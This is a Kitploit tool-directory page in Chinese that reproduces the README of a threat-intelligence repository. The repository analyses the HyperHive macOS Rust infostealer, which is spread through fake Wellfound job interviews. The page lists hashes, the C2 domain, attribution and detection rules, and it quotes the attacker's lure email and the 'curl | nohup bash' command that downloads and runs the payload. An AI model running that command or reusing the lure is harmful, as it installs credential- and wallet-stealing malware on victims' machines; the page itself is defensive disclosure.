Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
hyperhives-macos-infostealer-analysis — 完整静态分析 HyperHive macOS Rust 信息窃取器 — 571 个解密配置值、C2 基础设施、DPRK/Contagious Interview 归因、YARA/Sigma 规则、STIX 2.1 包、ATT&CK Navigator 层 | Kitploit
工具/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
危害指标 (IOC) 管理OSINT (开源情报)逆向工程取证分析恶意软件分析威胁情报论文与研究学习与教育精选资源

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

完整静态分析 HyperHive macOS Rust 信息窃取器 — 571 个解密配置值、C2 基础设施、DPRK/Contagious Interview 归因、YARA/Sigma 规则、STIX 2.1 包、ATT&CK Navigator 层

查看仓库网站
314135个月前Kitploit 审核通过

HyperHives macOS信息窃取器 — 全面技术分析

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

威胁情报: 基于Rust的macOS通用二进制信息窃取器,通过Wellfound(原名AngelList)上的虚假面试流程投递。操作者身份为来自"HyperHive"的"Felix",诱骗目标从macos.hyperhives.net运行恶意安装程序。本仓库记录了完整的静态分析:571个加密配置值已恢复,包括C2 URL、Sentry DSN以及276个被针对的Chrome扩展ID。

样本 SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2 域名cloudproxy.link
交付域名macos.hyperhives.net
诱饵平台Wellfound(原名AngelList)
操作者身份"Felix" 来自 "HyperHive"
VirusTotal9 / 63 检测
分类公开披露 / IOC 包
最后更新2026年4月

目录

  • 威胁情报包
  • 仓库布局
  • 快速开始
  • TL;DR
  • 1 — 攻击起源
  • 2 — 二进制文件
  • 3 — 窃取内容
  • 4 — 解密后的 C2 基础设施
  • 5 — 归因分析
  • 6 — 密码分析
  • 7 — MITRE ATT&CK 映射
  • 8 — 钱包与扩展 ID 参考
  • 9 — 建议措施
  • 10 — 方法论
  • 附录 A — 全部 276 个 Chrome 扩展 ID
  • 范围与限制
  • 发布历史
  • 贡献指南
  • 许可证

威胁情报包

文件格式用途
iocs.txt纯文本哈希、域名、URL、IP、邮箱、Sentry ID — 粘贴到黑名单、MISP、OpenCTI
yara_rules.yarYARA 4.2+已知样本哈希匹配 + Mach-O 启发式字符串检测
sigma_rules.ymlSigma代理、DNS 和进程创建规则 — 调整 logsource 以适应你的 SIEM
stix/bundle.jsonSTIX 2.1机器可读的CTI包,包含指标、恶意软件SDO、基础设施、ATT&CK模式及关系
attack-navigator-layer.jsonATT&CK Navigator导入 ATT&CK Navigator 查看可视化技术覆盖率

仓库布局```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---

## 快速开始

将样本放在 `sample/installer_binary` 目录下(哈希验证请参见 [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)),然后:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

The compose file enforces network_mode: none, read_only: true,并丢弃所有 Linux 功能。完整处理指南请参见 SECURITY.md。


TL;DR

在 Wellfound(原 AngelList)上的一则招聘信息引发了一个多邮件的社会工程链,来自操作者角色 "Felix" 和 "HyperHive"。在夸奖目标的技术背景并安排了一场虚假面试后,攻击者指示受害者“审查产品”于 hyperhives.net,并特别检查 Settings → Diagnostics → Log —— 这一借口旨在触发执行:``` curl -s https://macos.hyperhives.net/install | nohup bash &

该有效负载是一个**8.5 MB 的 Mach-O 通用二进制文件**(x86_64 + arm64),使用 Rust 编译。通过隔离的 Docker 实验室和 CPU 仿真对 **570 个独特的 x86_64 辅助例程**进行静态分析,恢复了**所有 571 个加密配置值**,揭示了:

- **C2:** `cloudproxy.link` — 四个 HTTPS 端点
- **Sentry(归属分析枢纽):** 完整的 DSN,包含 `ingest.de.sentry.io` 上的组织/项目 ID
- **构建身份:** Cargo 用户 `rootr`,代号 `force`,版本 `9.12.1`
- **目标:** 276 个 Chrome 扩展 ID(加密货币钱包、密码管理器、企业凭证)

这些策略与**朝鲜关联的 Contagious Interview** 活动一致——在合法平台上的虚假招聘、多步骤信任构建、`curl | bash` 交付、Rust macOS 窃取器以及针对加密货币的窃取。

---

## 1 — 攻击的起点

### 诱饵:Wellfound 上的虚假求职面试

攻击始于在 **Wellfound**(原 AngelList)上发布的一个**看似合法的职位信息**。目标申请后,以下邮件链从一位化名 **"Felix"**、公司名为 **"HyperHive"** 的操作者发出:

**邮件 1**(2026 年 4 月 4 日)—— 初次接触。"Felix" 确认了目标的简历和 LinkedIn,声称他们的"技术主管"批准了下一步,并特别提到了目标真实的技术经验。邮件称 HyperHive 正在"构建跨不同操作系统的 Hyperhives 桌面版本",并邀请目标在 UTC+0 时区安排面试。

**邮件 2**(2026 年 4 月 5 日)—— 后续安排。提议了具体的面试时间(2026 年 4 月 8 日 15:00 UTC),并包含了关键的有效负载交付指令:

> *"如果您可以的话,请也快速查看一下 **设置 → 诊断 → 日志** 下的产品日志。我们可能会要求您对日志以及您注意到的其他产品观察结果做一些简要评论,因为这通常是工程经验和关注细节的良好信号。"*

这将目标引导至 `https://hyperhives.net`,导航到诊断部分后触发了:```
curl -s https://macos.hyperhives.net/install | nohup bash &

接下来发生了什么

该命令下载并执行了一个8.5 MB的 Mach-O 通用二进制文件。通过 AppleScript 弹出了一个虚假的 macOS 密码对话框。**密码未被输入。**进程立即终止,样本被保留供分析。

社会工程学伎俩总结

元素详情
平台Wellfound (AngelList) — 正规求职网站
公司名称“HyperHive”(单数) / 域名 hyperhives.net
虚拟身份“Felix”
联系邮箱[email protected]
建立信任引用了目标真实的简历、LinkedIn 信息及具体技术技能
借口“面试前先体验产品”
触发载荷在 hyperhives.net 上操作“设置 → 诊断 → 日志”
时间安排虚假面试时间段(4月8日 15:00 UTC)以制造紧迫感
多步链条载荷投递前至少两封邮件,历时两天

2 — 二进制文件

属性值
文件installer_binary
大小8,504,768 字节
格式Mach-O 通用(x86_64 + arm64)
SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
SHA-12de897066c2fc7db91da78d7f9ded99237345077
MD50e95ab4038ec48657563c96bed840dd5
编译器rustc 1.87.0 (stable)
构建用户rootr(来自嵌入路径 /Users/rootr/.cargo/registry/...)
构建代号force
构建版本9.12.1
错误追踪Sentry Rust SDK v0.36.0
crate 数量97(参见 output/cargo_dependencies.txt)

该样本展现出生产级工程水准:语义化版本管理、Sentry 集成以保障运行可靠性,以及一个包含570个独特辅助函数加密的大型嵌入式配置。

VirusTotal 检测覆盖

完整报告 — 截至首次提交(2026年4月),63个引擎中有9个检测到。超过85%的引擎未能标记该样本。

下载工具